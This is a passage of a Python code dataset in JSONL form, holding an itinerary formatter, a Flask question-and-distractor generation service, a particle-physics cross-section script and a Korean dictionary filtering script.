night\\n\"\n output += f\" ${self.hotel.cost * 2} total\\n\\n\"\n output += f\"Friday \\n\"\n output += f\" Activities: \\n\"\n output += f\" Morning: N/A \\n\"\n output += f\" Afternoon: Arrival \\n\"\n output += f\" Evening: {self.ent.friday_eve[1]}\\n\"\n output += f\" ${self.ent.friday_eve[8]}\\n\"\n output += f\" {self.ent.friday_eve[12]}\\n\"\n output += f\" Meals: \\n\"\n output += f\" Dinner: {self.meals[0][1]} \\n\"\n output += f\" ${self.get_rest_price(self.meals[0][4])}\\n\"\n output += f\"Saturday \\n\"\n output += f\" Activities: \\n\"\n output += f\" Morning: {self.ent.saturday_mor[1]}\\n\"\n output += f\" ${self.ent.saturday_mor[8]}\\n\"\n output += f\" {self.ent.saturday_mor[12]}\\n\"\n output += f\" Afternoon: {self.ent.saturday_aft[1]}\\n\"\n output += f\" ${self.ent.saturday_aft[8]}\\n\"\n output += f\" {self.ent.saturday_aft[12]}\\n\"\n output += f\" Evening: {self.ent.saturday_eve[1]}\\n\"\n output += f\" ${self.ent.saturday_eve[8]}\\n\"\n output += f\" {self.ent.saturday_eve[12]}\\n\"\n output += f\" Meals: \\n\"\n output += f\" Breakfast: {self.meals[1][1]} \\n\"\n output += f\" ${self.get_rest_price(self.meals[1][4])}\\n\"\n output += f\" Lunch: {self.meals[2][1]} \\n\"\n output += f\" ${self.get_rest_price(self.meals[2][4])}\\n\"\n output += f\" Dinner: {self.meals[3][1]} \\n\"\n output += f\" ${self.get_rest_price(self.meals[3][4])}\\n\"\n output += f\"Sunday \\n\"\n output += f\" Activities: \\n\"\n output += f\" Morning: {self.ent.sunday_mor[1]}\\n\"\n output += f\" ${self.ent.sunday_mor[8]}\\n\"\n output += f\" {self.ent.sunday_mor[12]}\\n\"\n output += f\" Afternoon: Departure \\n\"\n output += f\" Evening: N/A \\n\"\n output += f\" Meals: \\n\"\n output += f\" Breakfast: {self.meals[4][1]} \\n\"\n output += f\" ${self.get_rest_price(self.meals[4][4])}\\n\"\n output += f\" Lunch: N/A \\n\"\n output += f\" Dinner: N/A \\n\"\n\n return output\n\n\n def get_expenses_str(self):\n output = f\"-- Expenses -- \\n\\n\"\n output += f\"Lodging: ${self.hotel_exp}\\n\"\n output += f\"Meals: ${self.meals_exp}\\n\"\n output += f\"Entertainment: ${self.ent_exp}\\n\\n\"\n output += f\"TOTAL: ${self.total_exp}\\n\"\n\n return output\n","sub_path":"itinerary.py","file_name":"itinerary.py","file_ext":"py","file_size_in_byte":5824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"97147228","text":"import os\nfrom flask import Flask\nfrom flask import render_template, request\nfrom t5_inf import RaceInfModule\n\n# Flask App\napp = Flask(__name__)\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\napp.config[\"APPLICATION_ROOT\"] = os.environ.get(\"APP_ROOT\",\"/service\")\n\n# Model\nq_model = RaceInfModule.load_from_checkpoint(app.config[\"APPLICATION_ROOT\"]+\"/ckpts/t5_que.ckpt\")\nq_model.eval()\nd_model = RaceInfModule.load_from_checkpoint(app.config[\"APPLICATION_ROOT\"]+\"/ckpts/t5_dis.ckpt\")\nd_model.eval()\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\",app_root=app.config[\"APPLICATION_ROOT\"])\n\n\n@app.route(\"/predict\",methods=[\"POST\"])\ndef predict():\n global q_model, d_model\n \n article=request.json[\"article\"]\n answer = request.json[\"answer\"]\n print(\"Start generating..\")\n question = q_model.generate_sentence(article, answer)\n print(\"Question generated!\")\n distractor = d_model.generate_sentence(article, answer, question)\n print(\"Distractor generated!\")\n\n generation = {'question': question, 'distractor': distractor}\n generation_html=render_template(\"result.html\",generation=generation)\n return {\"generation_html\":generation_html}\n\n\n@app.route(\"/predict_json\",methods=[\"POST\"])\ndef predict_json():\n global q_model, d_model\n\n article = request.json[\"article\"]\n answer = request.json[\"answer\"]\n question = q_model.generate_sentence(article, answer)\n distractor = d_model.generate_sentence(article, answer, question)\n\n generation = {'question': question, 'distractor': distractor}\n return {\"generation\":generation}\n","sub_path":"project/service/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"206429589","text":"import numpy as np\nimport copy\nimport ROOT as rt\npts=[100,200,500,1000]\nevents=['jj','qq','gg','qg','zj','zq','zg']\n#cut=\"pt>{} && pt < {} && eta<1 && eta > -1\"\ncut=\"pt>{} && pt < {}\"\nfs=25\n#f=open(\"etacrosssection\")\nf=open(\"effectivecrosssection\")\ncross=eval(\"\".join(f.readlines()))\nf.close()\nentries=copy.deepcopy(cross)\ncutentries=copy.deepcopy(cross)\nfor i in range(len(pts)):\n for ev in events:\n pt=pts[i]\n if(pt==100):\n ptmin=0.815*pt\n ptmax=1.159*pt\n if(pt==200):\n ptmin=0.819*pt\n ptmax=1.123*pt\n if(pt==500):\n ptmin=0.821*pt\n ptmax=1.093*pt\n if(pt==1000):\n ptmin=0.8235*pt\n ptmax=1.076*pt\n f=rt.TFile(\"Data/{}_pt_{}_{}.root\".format(ev,pts[i],int(1.1*pts[i])),'read')\n entries[ev][i]=f.Get(\"jetAnalyser\").GetEntries()\n cutentries[ev][i]=f.Get(\"jetAnalyser\").GetEntries(cut.format(ptmin,ptmax))\n cross[ev][i]=format(cross[ev][i]/entries[ev][i]*cutentries[ev][i],'.2e')\n f.Close()\nfor k in cross:\n a=\" {} |\"*5\n a=\"|\"+a\n print(a.format(k,*cross[k]))\n","sub_path":"howcross.py","file_name":"howcross.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"374505733","text":"import os\n\n# path = './trdg/dicts/kr.txt'\npath = 'kr_new.txt'\n\nkorean = 0\nenglish = 0\ndigits = 0\nsymbol = 0 \n\nother = {} \n\nnew_f = open('kr3.txt', 'w', encoding='utf8')\n\nwith open(path, 'r') as f:\n\n line = f.readline().strip()\n while (line):\n valid = True\n for ch in line: \n if ord('가') <= ord(ch) <= ord('힣') : \n korean += 1 \n elif ord('a') <= ord(ch) <= ord('z') or ord('A') <= ord(ch) <= ord('Z'):\n english += 1\n elif ch in ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']:\n digits += 1\n elif ch in ['.', '(', ')', '-' ] :\n symbol += 1\n else:\n if other.get(ch) is not None:\n other[ch] += 1\n else:\n other[ch] = 1 \n valid = False \n break\n\n if valid:\n new_f.write(line + '\\n')\n\n line = f.readline().strip()\n\nprint (f'korean: {korean} english: {english} digits:{digits} symbol: {symbol}')\n\nfor k, v in other.items():\n print (f'{k} {v}')\n\n\n","sub_path":"kr_data_stats.py","file_name":"kr_data_stats.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}